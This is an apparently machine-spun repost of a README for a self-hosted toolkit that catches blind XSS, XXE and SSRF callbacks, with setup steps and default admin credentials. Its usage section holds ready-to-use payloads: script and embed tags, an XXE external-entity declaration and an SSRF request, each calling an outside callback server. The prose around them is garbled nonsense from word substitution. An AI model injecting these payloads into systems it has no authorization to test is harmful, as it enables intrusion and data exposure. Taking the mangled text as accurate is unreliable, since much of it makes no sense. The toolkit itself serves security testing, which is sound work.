B-Xssrf - Toolkit To Discovery Together With Choke Along Rail On Blind Xss, Xxe Together With Ssrf
Toolkit to unwrap as well as operate past times on runway on Blind XSS, XXE & SSRF.
SETUP
- Upload the files to your server.
- Create a Database as well as upload database.sql file to it.
- Change the DB Credentials inwards db.php file.
- Ready.
USAGE
BLIND XSS
<embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php">
BLIND XXE<?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r>
SSRFGET /testssrf.php=http://mysite.com/bxssrf/request.php
DEFAULT CREDENTIALS
USER : admin@test.com PASS : 123456